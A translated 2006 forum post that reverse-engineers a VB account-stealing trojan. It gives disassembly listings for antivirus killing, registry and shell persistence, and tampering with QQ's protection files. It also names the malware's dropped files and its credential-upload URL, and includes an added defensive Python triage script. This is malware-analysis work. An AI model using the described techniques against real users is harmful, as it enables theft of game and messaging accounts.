Analysis of a Virus (boss, I wasn't sure which board to post this in)
【Title】Analysis of a Virus
【Author】FoBnN
【Author e-mail】fobcrackgp163.com
【Author homepage】www.hack58.com
【Tools】OD+LOPE+xxxxxxxxxxxxx
【Platform】XP+SP2
【Software】some account-stealing program; I still don't know what it is
【Size】48K
【Original download】
【Protection】NSPACK
【Description】none
【Statement】Damn, I despise people who trojan web pages, but I also have to thank this one: without his drive-by there would be no analysis!
------------------------------------------------------------------------
Background:
Today, while looking for study material online, I happened to open a site, and before long I noticed the process count had reached 87!!!! Cold sweat!!!
Looking at the page source showed it had been trojaned, using the ADO vulnerability exploit written by GOLDSUN.
I quickly disconnected and rebooted. A first scan with QQKAV and RAV turned up 黑防鸽子 (the Hacker Defence edition of Gray Pigeon) and GSERVERVIP2006, plus several account stealers. The RAV monitor service would not start, and then BAIGOO, CND, 超级影吧 and other adware turned out to be rampant; I removed them one by one. On opening QQ I found that NSPROTECT failed to start, but no red X appeared. Bad news.
①.
Opened Task Manager and found two SMSS.exe. One of them was running under my current user account rather than SYSTEM. Very suspicious.
===================================================================================
Found it under %windir%; Ctrl+C would not copy it, so I opened it in UltraEdit and saved it, which finally got me a copy. Ended the process and deleted the file.
Checked with PEiD:
the sections are XXX1, XXX2, XXX3, so it is NSPACK.
===================================================================================
OD, the ESP trick, dump, fix imports: the file grows from 48K to 264K.
00403644 >68 6C394000 push dumped_.0040396C ;OEP
00403649 E8 F0FFFFFF call <jmp.&msvbvm50.ThunRTMain>
0040364E 0000 add byte ptr ds:,al
00403650 0000 add byte ptr ds:,al
00403652 0000 add byte ptr ds:,al
00403654 3000 xor byte ptr ds:,al
00403656 0000 add byte ptr ds:,al
====================================================================================
② Since it turned out to be a VB program, I loaded it into GetVBRes to go through the resources for any key information.
Wow, a look turned up quite a lot. See figure 1 and figure 2:
http://bbs.hack58.com/attachment/Fid_39/39_1755_3dfa7340570d490.jpg
http://bbs.hack58.com/attachment/Fid_39/39_1755_3aa4fdbd0364f8e.jpg
====================================================================================
③ Now analyze it with OD.
00413567 E8 28FFFEFF call <jmp.&msvbvm50.rtcMsgBox> ; at runtime this pops up a misleading message box
00414A3E /74 05 je short dumped_.00414A45
00414A40 |E9 552A0000 jmp dumped_.0041749A
00414A45 \C745 FC 0A00000>mov dword ptr ss:,0A
00414A4C E8 092F0000 call dumped_.0041795A ; this CALL detects and kills antivirus software
-----------
0041795A 55 push ebp
0041795B 8BEC mov ebp,esp
0041795D 83EC 18 sub esp,18
00417960 68 06324000 push <jmp.&msvbvm50.__vbaExceptHandler>
00417965 64:A1 00000000 mov eax,dword ptr fs:
0041796B 50 push eax
0041796C 64:8925 0000000>mov dword ptr fs:,esp
00417973 B8 38050000 mov eax,538
00417978 E8 83B8FEFF call <jmp.&msvbvm50.__vbaChkstk>
0041797D 53 push ebx
0041797E 56 push esi
0041797F 57 push edi
00417980 8965 E8 mov dword ptr ss:,esp
00417983 C745 EC C01C400>mov dword ptr ss:,dumped_.00401CC0
0041798A 8365 F0 00 and dword ptr ss:,0
0041798E 8365 F4 00 and dword ptr ss:,0
00417992 C745 FC 0100000>mov dword ptr ss:,1
00417999 C745 FC 0200000>mov dword ptr ss:,2
004179A0 6A FF push -1
004179A2 E8 81BAFEFF call <jmp.&msvbvm50.__vbaOnError>
004179A7 C745 FC 0300000>mov dword ptr ss:,3
004179AE 6A 00 push 0
004179B0 6A 02 push 2
004179B2 E8 49DBFEFF call dumped_.00405500
004179B7 8985 54FDFFFF mov dword ptr ss:,eax
004179BD E8 0CBAFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004179C2 8B85 54FDFFFF mov eax,dword ptr ss:
004179C8 8945 D8 mov dword ptr ss:,eax
004179CB C745 FC 0400000>mov dword ptr ss:,4
004179D2 C785 A4FDFFFF 2>mov dword ptr ss:,128
004179DC C745 FC 0500000>mov dword ptr ss:,5
004179E3 8D85 A4FDFFFF lea eax,dword ptr ss:
004179E9 50 push eax
004179EA 8D85 28FCFFFF lea eax,dword ptr ss:
004179F0 50 push eax
004179F1 68 48534000 push dumped_.00405348
004179F6 E8 1DBBFEFF call <jmp.&msvbvm50.__vbaRecUniToAnsi>
004179FB 50 push eax
004179FC FF75 D8 push dword ptr ss:
004179FF E8 3CDBFEFF call dumped_.00405540
00417A04 8985 54FDFFFF mov dword ptr ss:,eax
00417A0A E8 BFB9FEFF call <jmp.&msvbvm50.__vbaSetSystemError>
00417A0F 8D85 28FCFFFF lea eax,dword ptr ss:
00417A15 50 push eax
00417A16 8D85 A4FDFFFF lea eax,dword ptr ss:
00417A1C 50 push eax
00417A1D 68 48534000 push dumped_.00405348
00417A22 E8 EBBAFEFF call <jmp.&msvbvm50.__vbaRecAnsiToUni>
00417A27 83BD 54FDFFFF 0>cmp dword ptr ss:,0
00417A2E 0F84 EE130000 je dumped_.00418E22
00417A34 C745 FC 0700000>mov dword ptr ss:,7
00417A3B 66:83A5 58FDFFF>and word ptr ss:,0
00417A43 8D85 58FDFFFF lea eax,dword ptr ss:
00417A49 50 push eax
00417A4A 8D85 C8FDFFFF lea eax,dword ptr ss:
00417A50 50 push eax
00417A51 68 04010000 push 104
00417A56 E8 79B9FEFF call <jmp.&msvbvm50.__vbaStrFixstr>
00417A5B 8BD0 mov edx,eax
00417A5D 8D8D A0FDFFFF lea ecx,dword ptr ss:
00417A63 E8 96B9FEFF call <jmp.&msvbvm50.__vbaStrMove>
00417A68 50 push eax
00417A69 E8 6591FFFF call dumped_.00410BD3
00417A6E 8BD0 mov edx,eax
00417A70 8D8D 9CFDFFFF lea ecx,dword ptr ss:
00417A76 E8 83B9FEFF call <jmp.&msvbvm50.__vbaStrMove>
00417A7B FFB5 A0FDFFFF push dword ptr ss:
00417A81 8D85 C8FDFFFF lea eax,dword ptr ss:
00417A87 50 push eax
00417A88 68 04010000 push 104
00417A8D E8 36B9FEFF call <jmp.&msvbvm50.__vbaLsetFixstr>
00417A92 8B85 9CFDFFFF mov eax,dword ptr ss:
00417A98 8985 E8FAFFFF mov dword ptr ss:,eax
00417A9E 83A5 9CFDFFFF 0>and dword ptr ss:,0
00417AA5 8B85 E8FAFFFF mov eax,dword ptr ss:
00417AAB 8985 94FDFFFF mov dword ptr ss:,eax
00417AB1 C785 8CFDFFFF 0>mov dword ptr ss:,8
00417ABB 8D85 8CFDFFFF lea eax,dword ptr ss:
00417AC1 50 push eax
00417AC2 8D85 7CFDFFFF lea eax,dword ptr ss:
00417AC8 50 push eax
00417AC9 E8 A0B8FEFF call <jmp.&msvbvm50.rtcUpperCaseVar>
00417ACE C785 64FDFFFF 7>mov dword ptr ss:,dumped_.00408974 ; UNICODE "RAVMON.EXE" ; Rising antivirus
00417BF5 C785 64FDFFFF 9>mov dword ptr ss:,dumped_.00408990 ; UNICODE "TROJDIE*"
00417D1C C785 64FDFFFF A>mov dword ptr ss:,dumped_.004089A8 ; UNICODE "KPOP*"
00417E43 C785 64FDFFFF B>mov dword ptr ss:,dumped_.004089B8 ; UNICODE "CCENTER*"
00417F6A C785 64FDFFFF D>mov dword ptr ss:,dumped_.004089D0 ; UNICODE "*ASSISTSE*"
00418084 C785 64FDFFFF E>mov dword ptr ss:,dumped_.004089EC ; UNICODE "KPFW*"
004181AB C785 64FDFFFF F>mov dword ptr ss:,dumped_.004089FC ; UNICODE "AGENTSVR*"
004182D2 C785 64FDFFFF 1>mov dword ptr ss:,dumped_.00408A14 ; UNICODE "KV*" ; and many more: all the big-name ones are in the list
=======================================================================================
004168F1 68 90864000 push dumped_.00408690 ; UNICODE "SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\Runservices"
004169D9 68 78864000 push dumped_.00408678 ; UNICODE "TProgram"
............................................................ started as a service
00416666 /74 4A je short dumped_.004166B2
00416668 |C745 FC 6E00000>mov dword ptr ss:,6E
0041666F |6A 0E push 0E
00416671 |68 F4854000 push dumped_.004085F4 ; UNICODE "Explorer.exe 1"
00416676 |8D45 B4 lea eax,dword ptr ss:
00416679 |50 push eax
0041667A |E8 5BCDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
0041667F |50 push eax
00416680 |6A 01 push 1
00416682 |6A 00 push 0
00416684 |68 E4854000 push dumped_.004085E4 ; UNICODE "Shell"
00416689 |8D45 B8 lea eax,dword ptr ss:
0041668C |50 push eax
0041668D |E8 48CDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
00416692 |50 push eax
00416693 |FF75 CC push dword ptr ss:
00416696 |E8 FDF1FEFF call dumped_.00405898
0041669B |E8 2ECDFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004166A0 |8D45 B4 lea eax,dword ptr ss:
004166A3 |50 push eax
004166A4 |8D45 B8 lea eax,dword ptr ss:
004166A7 |50 push eax
004166A8 |6A 02 push 2
004166AA |E8 37CDFEFF call <jmp.&msvbvm50.__vbaFreeStrList>
004166AF |83C4 0C add esp,0C
004166B2 \C745 FC 7000000>mov dword ptr ss:,70
004166B9 8D45 CC lea eax,dword ptr ss:
004166BC 50 push eax
004166BD 68 18864000 push dumped_.00408618 ; UNICODE "SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN"
004166C2 8D45 B8 lea eax,dword ptr ss:
004166C5 50 push eax
004166C6 E8 0FCDFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
004166CB 50 push eax
004166CC 68 02000080 push 80000002
004166D1 E8 FEF0FEFF call dumped_.004057D4
004166D6 8985 18FFFFFF mov dword ptr ss:,eax
004166DC E8 EDCCFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004166E1 33C0 xor eax,eax
004166E3 83BD 18FFFFFF 0>cmp dword ptr ss:,0
004166EA 0F94C0 sete al
004166ED F7D8 neg eax
004166EF 66:8985 0CFFFFF>mov word ptr ss:,ax
004166F6 8D4D B8 lea ecx,dword ptr ss:
004166F9 E8 06CDFEFF call <jmp.&msvbvm50.__vbaFreeStr>
004166FE 0FBF85 0CFFFFFF movsx eax,word ptr ss:
00416705 85C0 test eax,eax
00416707 0F84 D9010000 je dumped_.004168E6
0041670D C745 FC 7100000>mov dword ptr ss:,71
00416714 C785 58FFFFFF E>mov dword ptr ss:,dumped_.004062E4
0041671E C785 50FFFFFF 0>mov dword ptr ss:,8
00416728 8D95 50FFFFFF lea edx,dword ptr ss:
0041672E 8D4D 90 lea ecx,dword ptr ss:
00416731 E8 CCCBFEFF call <jmp.&msvbvm50.__vbaVarDup>
00416736 8D45 90 lea eax,dword ptr ss:
00416739 50 push eax
0041673A 68 2C010000 push 12C
0041673F 8D45 80 lea eax,dword ptr ss:
00416742 50 push eax
00416743 E8 AECBFEFF call <jmp.&msvbvm50.rtcStringVar>
00416748 8D45 80 lea eax,dword ptr ss:
0041674B 50 push eax
0041674C E8 35CCFEFF call <jmp.&msvbvm50.__vbaStrVarMove>
00416751 8BD0 mov edx,eax
00416753 8D4D D0 lea ecx,dword ptr ss:
00416756 E8 A3CCFEFF call <jmp.&msvbvm50.__vbaStrMove>
0041675B 8D45 80 lea eax,dword ptr ss:
0041675E 50 push eax
0041675F 8D45 90 lea eax,dword ptr ss:
00416762 50 push eax
00416763 6A 02 push 2
00416765 E8 0ACCFEFF call <jmp.&msvbvm50.__vbaFreeVarList>
0041676A 83C4 0C add esp,0C
0041676D C745 FC 7200000>mov dword ptr ss:,72
00416774 C785 14FFFFFF 2>mov dword ptr ss:,12C
0041677E C785 18FFFFFF 0>mov dword ptr ss:,1
00416788 8D85 14FFFFFF lea eax,dword ptr ss:
0041678E 50 push eax
0041678F FF75 D0 push dword ptr ss:
00416792 8D45 B4 lea eax,dword ptr ss:
00416795 50 push eax
00416796 E8 3FCCFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
0041679B 50 push eax
0041679C 8D85 18FFFFFF lea eax,dword ptr ss:
004167A2 50 push eax
004167A3 6A 00 push 0
004167A5 68 78864000 push dumped_.00408678 ; UNICODE "TProgram"
004167AA 8D45 B8 lea eax,dword ptr ss:
004167AD 50 push eax
004167AE E8 27CCFEFF call <jmp.&msvbvm50.__vbaStrToAnsi>
004167B3 50 push eax
004167B4 FF75 CC push dword ptr ss:
004167B7 E8 9CF0FEFF call dumped_.00405858
004167BC 8985 10FFFFFF mov dword ptr ss:,eax
004167C2 E8 07CCFEFF call <jmp.&msvbvm50.__vbaSetSystemError>
004167C7 FF75 B4 push dword ptr ss:
004167CA 8D45 D0 lea eax,dword ptr ss:
004167CD 50 push eax
004167CE E8 EFCBFEFF call <jmp.&msvbvm50.__vbaStrToUnicode>
004167D3 33C0 xor eax,eax
004167D5 83BD 10FFFFFF 0>cmp dword ptr ss:,0
004167DC 0F95C0 setne al
004167DF F7D8 neg eax
004167E1 66:8985 0CFFFFF>mov word ptr ss:,ax
004167E8 8D45 B4 lea eax,dword ptr ss:
004167EB 50 push eax
004167EC 8D45 B8 lea eax,dword ptr ss:
004167EF 50 push eax
004167F0 6A 02 push 2
004167F2 E8 EFCBFEFF call <jmp.&msvbvm50.__vbaFreeStrList>
004167F7 83C4 0C add esp,0C
004167FA 0FBF85 0CFFFFFF movsx eax,word ptr ss:
00416801 85C0 test eax,eax
00416803 0F84 DD000000 je dumped_.004168E6
00416809 C745 FC 7300000>mov dword ptr ss:,73
00416810 E8 072F0000 call dumped_.0041971C
00416815 8BD0 mov edx,eax
00416817 8D4D A0 lea ecx,dword ptr ss:
0041681A E8 DFCBFEFF call <jmp.&msvbvm50.__vbaStrMove>
0041681F 8B45 A0 mov eax,dword ptr ss:
00416822 8985 ECFEFFFF mov dword ptr ss:,eax
00416828 8365 A0 00 and dword ptr ss:,0
0041682C E8 EB2E0000 call dumped_.0041971C
00416831 8BD0 mov edx,eax
00416833 8D4D B4 lea ecx,dword ptr ss:
00416836 E8 C3CBFEFF call <jmp.&msvbvm50.__vbaStrMove>
0041683B 50 push eax
0041683C 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE"
00416841 E8 9ACBFEFF call <jmp.&msvbvm50.__vbaStrCat>
00416846 8BD0 mov edx,eax
00416848 8D4D B0 lea ecx,dword ptr ss:
0041684B E8 AECBFEFF call <jmp.&msvbvm50.__vbaStrMove>
00416850 50 push eax
00416851 E8 9CCBFEFF call <jmp.&msvbvm50.__vbaLenBstr>
00416856 50 push eax
00416857 8B95 ECFEFFFF mov edx,dword ptr ss:
0041685D 8D4D B8 lea ecx,dword ptr ss:
00416860 E8 99CBFEFF call <jmp.&msvbvm50.__vbaStrMove>
00416865 50 push eax
00416866 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE" ; chained to EXPLORER
00416A70 68 08794000 push dumped_.00407908 ; UNICODE "\SMSS.EXE"
Account theft, part one: QQ.
004280EC 55 push ebp
004280ED 8BEC mov ebp,esp
004280EF 83EC 18 sub esp,18
004280F2 68 06324000 push <jmp.&msvbvm50.__vbaExceptHandler>
004280F7 64:A1 00000000 mov eax,dword ptr fs:
004280FD 50 push eax
004280FE 64:8925 0000000>mov dword ptr fs:,esp
00428105 B8 C4000000 mov eax,0C4
0042810A E8 F1B0FDFF call <jmp.&msvbvm50.__vbaChkstk>
0042810F 53 push ebx
00428110 56 push esi
00428111 57 push edi
00428112 8965 E8 mov dword ptr ss:,esp
00428115 C745 EC 382C400>mov dword ptr ss:,dumped_.00402C38
0042811C 8365 F0 00 and dword ptr ss:,0
00428120 8365 F4 00 and dword ptr ss:,0
00428124 C745 FC 0100000>mov dword ptr ss:,1
0042812B 8B55 08 mov edx,dword ptr ss:
0042812E 8D4D D4 lea ecx,dword ptr ss:
00428131 E8 D4B2FDFF call <jmp.&msvbvm50.__vbaStrCopy>
00428136 68 649F4000 push dumped_.00409F64
0042813B 8D45 B4 lea eax,dword ptr ss:
0042813E 50 push eax
0042813F E8 A0B1FDFF call <jmp.&msvbvm50.__vbaAryConstruct>
00428144 C745 FC 0200000>mov dword ptr ss:,2
0042814B 6A FF push -1
0042814D E8 D6B2FDFF call <jmp.&msvbvm50.__vbaOnError>
00428152 C745 FC 0300000>mov dword ptr ss:,3
00428159 68 DC9E4000 push dumped_.00409EDC ; UNICODE "0000010001000C0C000001000800E804"
0042815E E8 8690FEFF call dumped_.004111E9
00428163 8BD0 mov edx,eax
00428165 8D4D AC lea ecx,dword ptr ss:
00428168 E8 91B2FDFF call <jmp.&msvbvm50.__vbaStrMove>
0042816D C745 FC 0400000>mov dword ptr ss:,4
00428174 FF75 D4 push dword ptr ss:
00428177 68 249F4000 push dumped_.00409F24 ; UNICODE "\qqpnpp.sys" ; the string "qqpnpp.sys" shows up
0042817C E8 5FB2FDFF call <jmp.&msvbvm50.__vbaStrCat> ; appended to the QQ install directory
00428181 8945 94 mov dword ptr ss:,eax
00428184 C745 8C 0800000>mov dword ptr ss:,8
0042818B 8D45 8C lea eax,dword ptr ss:
0042818E 50 push eax
0042818F E8 F4B2FDFF call <jmp.&msvbvm50.rtcKillFiles> ; deletes the file
00428194 8D4D 8C lea ecx,dword ptr ss:
00428197 E8 F6B1FDFF call <jmp.&msvbvm50.__vbaFreeVar>
0042819C C745 FC 0500000>mov dword ptr ss:,5
004281A3 E8 7AB2FDFF call <jmp.&msvbvm50.rtcDoEvents> ; loop
004281A8 C745 FC 0600000>mov dword ptr ss:,6
004281AF FF75 D4 push dword ptr ss:
004281B2 68 389E4000 push dumped_.00409E38 ; UNICODE "\npkcrypt.vxd" ; the string "npkcrypt.vxd" shows up
004281B7 E8 24B2FDFF call <jmp.&msvbvm50.__vbaStrCat> ; appended to the QQ install directory
004281BC 8BD0 mov edx,eax
004281BE 8D4D A0 lea ecx,dword ptr ss:
004281C1 E8 38B2FDFF call <jmp.&msvbvm50.__vbaStrMove>
004281C6 50 push eax
004281C7 E8 F4B2FDFF call <jmp.&msvbvm50.rtcKillFiles> ; deletes the file
--------------------------------------------------------------------------------------
0042832A 8D45 9C lea eax,dword ptr ss:
0042832D 50 push eax
0042832E E8 E3B0FDFF call <jmp.&msvbvm50.__vbaObjSet>
00428333 8985 24FFFFFF mov dword ptr ss:,eax
00428339 8B85 24FFFFFF mov eax,dword ptr ss:
0042833F 8B00 mov eax,dword ptr ds:
00428341 FFB5 24FFFFFF push dword ptr ss:
00428347 FF50 48 call dword ptr ds:
0042834A 8D4D 9C lea ecx,dword ptr ss:
0042834D E8 BEB0FDFF call <jmp.&msvbvm50.__vbaFreeObj>
00428352 C745 FC 0D00000>mov dword ptr ss:,0D
00428359 FF75 D4 push dword ptr ss:
0042835C 68 409F4000 push dumped_.00409F40 ; UNICODE "\LoginCtrl.dll"
00428361 E8 7AB0FDFF call <jmp.&msvbvm50.__vbaStrCat>
00428366 8BD0 mov edx,eax
00428368 8D4D A4 lea ecx,dword ptr ss:
0042836B E8 8EB0FDFF call <jmp.&msvbvm50.__vbaStrMove>
00428370 50 push eax
00428371 6A 21 push 21
00428373 6A FF push -1
00428375 68 20100000 push 1020
0042837A E8 EBB0FDFF call <jmp.&msvbvm50.__vbaFileOpen> ; opens the file
0042837F 8D4D A4 lea ecx,dword ptr ss:
00428382 E8 7DB0FDFF call <jmp.&msvbvm50.__vbaFreeStr>
00428387 C745 FC 0E00000>mov dword ptr ss:,0E
0042838E E8 8FB0FDFF call <jmp.&msvbvm50.rtcDoEvents> ; hands control back to the system
00428393 C745 FC 0F00000>mov dword ptr ss:,0F
0042839A C745 94 0400028>mov dword ptr ss:,80020004
004283A1 C745 8C 0A00000>mov dword ptr ss:,0A
004283A8 8D45 8C lea eax,dword ptr ss:
004283AB 50 push eax
004283AC E8 69AFFDFF call <jmp.&msvbvm50.rtcRandomize>
004283B1 8D4D 8C lea ecx,dword ptr ss:
004283B4 E8 D9AFFDFF call <jmp.&msvbvm50.__vbaFreeVar>
004283B9^ E9 C9FEFFFF jmp dumped_.00428287
004283BE C745 FC 1100000>mov dword ptr ss:,11
004283C5 C645 B0 01 mov byte ptr ss:,1
004283C9 C745 FC 1200000>mov dword ptr ss:,12
004283D0 6A 21 push 21
004283D2 E8 7DB1FDFF call <jmp.&msvbvm50.rtcFileLength> ; reads the file length
004283D7 8985 44FFFFFF mov dword ptr ss:,eax
004283DD C785 48FFFFFF 0>mov dword ptr ss:,1000
004283E7 C745 DC 0000010>mov dword ptr ss:,10000 ; UNICODE "=::=::\" ; compare
004283EE EB 0C jmp short dumped_.004283FC
004283F0 8B45 DC mov eax,dword ptr ss:
004283F3 0385 48FFFFFF add eax,dword ptr ss:
004283F9 8945 DC mov dword ptr ss:,eax
004283FC 8B45 DC mov eax,dword ptr ss:
004283FF 3B85 44FFFFFF cmp eax,dword ptr ss: ; the code above modifies LoginCtrl.dll so that the red X does not appear
=============================================================================
00427E93 /0F84 95000000 je dumped_.00427F2E
00427E99 |8D45 08 lea eax,dword ptr ss:
00427E9C |50 push eax
00427E9D |E8 C5000000 call dumped_.00427F67
00427EA2 |8BD0 mov edx,eax
00427EA4 |8D4D D8 lea ecx,dword ptr ss:
00427EA7 |E8 52B5FDFF call <jmp.&msvbvm50.__vbaStrMove>
00427EAC |FF75 D8 push dword ptr ss:
00427EAF |68 CC9E4000 push dumped_.00409ECC ; UNICODE "Edit" ; control on the QQ login dialog
00427EB4 |E8 03B5FDFF call <jmp.&msvbvm50.__vbaStrCmp> ; compare
00427EB9 |85C0 test eax,eax
00427EBB |75 76 jnz short dumped_.00427F33
00427EBD |FF75 08 push dword ptr ss:
00427EC0 |E8 B3EAFDFF call dumped_.00406978
00427EC5 |8BF0 mov esi,eax
00427EC7 |E8 02B5FDFF call <jmp.&msvbvm50.__vbaSetSystemError>
00427ECC |8D45 CC lea eax,dword ptr ss:
00427ECF |50 push eax
00427ED0 |8975 CC mov dword ptr ss:,esi
00427ED3 |E8 8F000000 call dumped_.00427F67
00427ED8 |8BD0 mov edx,eax
00427EDA |8D4D D4 lea ecx,dword ptr ss:
00427EDD |E8 1CB5FDFF call <jmp.&msvbvm50.__vbaStrMove>
00427EE2 |50 push eax
00427EE3 |68 60674000 push dumped_.00406760 ; UNICODE "#32770" ; the QQ login dialog
00427EE8 |E8 CFB4FDFF call <jmp.&msvbvm50.__vbaStrCmp> ; compare
==========================================================================
Too tired, so I'll stop here for now.
I found the program can also steal WOW, 梦友 and 联众 (Lianzhong) accounts, and it has a blacklist with all the antivirus products in it. It starts as a service, hides in the registry too, and chains itself to EXPLORER.
It also cracks the updaters of WOW, 梦幻 and the like so they cannot update.
------------------------------------------------------------------------
This is the first time I have seen an account stealer like this, with so many functions written in VB.
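As an added example (not the original poster's code), here is an offline triage check that applies the indicators found in this analysis to a host snapshot: a second SMSS.exe running as a normal user outside system32, the TProgram value under Run/RunServices, a Winlogon Shell value chained to another program, the self-copies in %windir% and the upload address from the author's update. The Winlogon key path and the snapshot contents are assumptions.

```python
"""Offline triage for the indicators in this analysis (added example, not the
poster's code): it checks a constructed host snapshot, not a live machine."""
import ntpath

WINDIR = r"C:\WINDOWS"
# Indicators taken from the listing and the author's update.
SELF_COPIES = {"smss.exe", "exeroute.exe", "1.com", "explorer.com", "finder.com"}
RUN_KEYS = (r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
            r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices")
PERSIST_VALUE = "TProgram"
# Assumption: the "Shell" value written in the listing is Winlogon\Shell.
WINLOGON_SHELL = (r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
EXFIL_HOST = "qq.etsoft.com.cn"


def triage(procs, registry, windir_files, http_hosts):
    """Return one finding string per matched indicator (empty list = clean)."""
    findings = []
    # 1. A second smss.exe: the real one lives in system32 and runs as SYSTEM.
    sys32 = ntpath.join(WINDIR, "system32").lower()
    for name, path, user in procs:
        if name.lower() == "smss.exe" and (
                ntpath.dirname(path).lower() != sys32 or user.upper() != "SYSTEM"):
            findings.append(f"smss.exe outside system32 or not SYSTEM: {path} ({user})")
    # 2. Persistence: TProgram under Run/RunServices and a chained Winlogon Shell.
    for key in RUN_KEYS:
        data = registry.get((key, PERSIST_VALUE))
        if data:
            findings.append(f"{key}\\{PERSIST_VALUE} = {data}")
    shell = registry.get(WINLOGON_SHELL, "explorer.exe")
    if shell.strip().lower() != "explorer.exe":
        findings.append(f"Winlogon Shell chains another program: {shell!r}")
    # 3. Self-copies dropped into %windir%.
    for fname in windir_files:
        if fname.lower() in SELF_COPIES:
            findings.append(f"dropped copy in %windir%: {fname}")
    # 4. Upload of stolen credentials to the collector host.
    for host in http_hosts:
        if host.lower() == EXFIL_HOST:
            findings.append(f"outbound POST to credential collector {host}")
    return findings


# Constructed snapshot modelled on what the author saw (not captured data).
SNAPSHOT = dict(
    procs=[("smss.exe", r"C:\WINDOWS\system32\smss.exe", "SYSTEM"),
           ("smss.exe", r"C:\WINDOWS\smss.exe", "FoBnN")],
    registry={(RUN_KEYS[0], PERSIST_VALUE): r"C:\WINDOWS\smss.exe",
              WINLOGON_SHELL: "Explorer.exe 1"},
    windir_files=["explorer.exe", "smss.exe", "1.com", "finder.com", "notepad.exe"],
    http_hosts=["www.hack58.com", "qq.etsoft.com.cn"],
)

if __name__ == "__main__":
    for line in triage(**SNAPSHOT):
        print(line)
```

On a real host the same function can be fed from Task Manager, a registry export and a directory listing of %windir%; the snapshot above yields seven findings.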
------------------------------------------------------------------------
【Copyright】BY FoBnN qq:380838221

Update: also found that the program copies itself into %windir% under the names
ExERoute.exe
1.com
explorer.com
finder.com
The web address that receives the stolen data is qq.etsoft.com.cn/QQ38/postdata.asp?

Reply (quoting fobnn's post of 2006-8-8 15:46): Wow, you guys have moved on to dissecting viruses now~ support for the anti-virus crowd.
Reply: Expert.......
Reply: A virus? Way too hardcore, I wouldn't even dare touch one.
Reply (quoting fobnn's post of 2006-8-8 15:07): Ha, this one really does have a lot of features. One I wrote earlier only had 60% of the functionality, then my hard drive died and it was Game Over. Bad luck~~~